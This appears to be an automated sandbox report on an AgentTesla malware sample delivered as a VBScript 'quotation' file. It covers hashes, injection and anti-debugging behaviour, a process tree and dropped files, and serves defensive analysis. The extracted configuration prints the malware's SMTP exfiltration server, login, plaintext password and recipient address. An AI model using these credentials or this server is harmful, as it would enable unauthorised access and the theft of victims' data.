Analysis
- max time kernel: 142s
- max time network: 148s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 18-06-2024 09:36
- Static task: static1
- Behavioral task: behavioral1
- Sample: MV ROYAL QUOTATION.vbs
- Resource: win7-20231129-en
General
- Target: MV ROYAL QUOTATION.vbs
- Size: 92KB
- MD5: 1a0f278542c1a82b36d2a9339c44343f
- SHA1: 7464df5fb5eae9f2bb2de37aac91729be222c801
- SHA256: 03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
- SHA512: 4e3e255185ffe407661cd5f6ef18aceaf39e4b7410926e14c2580fe9ba7a5ba3edbdf5834c03eec9662ab6b111da262ba5f8632e3304766eb99f42a60eb62ec6
- SSDEEP: 1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5R/:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMT
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: mail.myhydropowered.com
- Port: 587
- Username: [email protected]
- Password: 0TFiRgPxmCJcdSB
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (5 IoCs)
  Processes: powershell.exe (PID 1172), flows 5, 7, 9, 12, 14
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flows: 20 api.ipify.org, 21 api.ipify.org, 22 ip-api.com
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  Processes: wab.exe (PID 2752)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: powershell.exe (PID 2308), wab.exe (PID 2752)
- Suspicious use of SetThreadContext (1 IoC)
  PID 2308 powershell.exe set thread context of PID 2752 wab.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe (PID 1172), powershell.exe (PID 2308, x2), wab.exe (PID 2752, x2)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes: powershell.exe (PID 2308)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token SeDebugPrivilege: powershell.exe (PID 1172), powershell.exe (PID 2308), wab.exe (PID 2752)
- Suspicious use of WriteProcessMemory (20 IoCs)
  PID 1072 WScript.exe wrote to memory of PID 1172 powershell.exe (x3)
  PID 1172 powershell.exe wrote to memory of PID 2880 cmd.exe (x3)
  PID 1172 powershell.exe wrote to memory of PID 2308 powershell.exe (x4)
  PID 2308 powershell.exe wrote to memory of PID 1732 cmd.exe (x4)
  PID 2308 powershell.exe wrote to memory of PID 2752 wab.exe (x6)
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"
  Signatures:
  - Suspicious use of WriteProcessMemory
  PID: 1072
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -windowstyle 1 "<obfuscated PowerShell script omitted>"
    Signatures:
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1172
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
      PID: 2880
    - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<same obfuscated PowerShell script as the parent powershell.exe, omitted>"
      Signatures:
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2308
      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
        PID: 1732
      - C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        Signatures:
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2752
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (342B)
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 (242B)
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MAN20DV3AE7N9FNLNFE9.temp (7KB)
- Eight further dropped files with no recorded path (1KB, 70KB, 3KB, 4KB, 1KB, 1KB, 3KB, 494KB)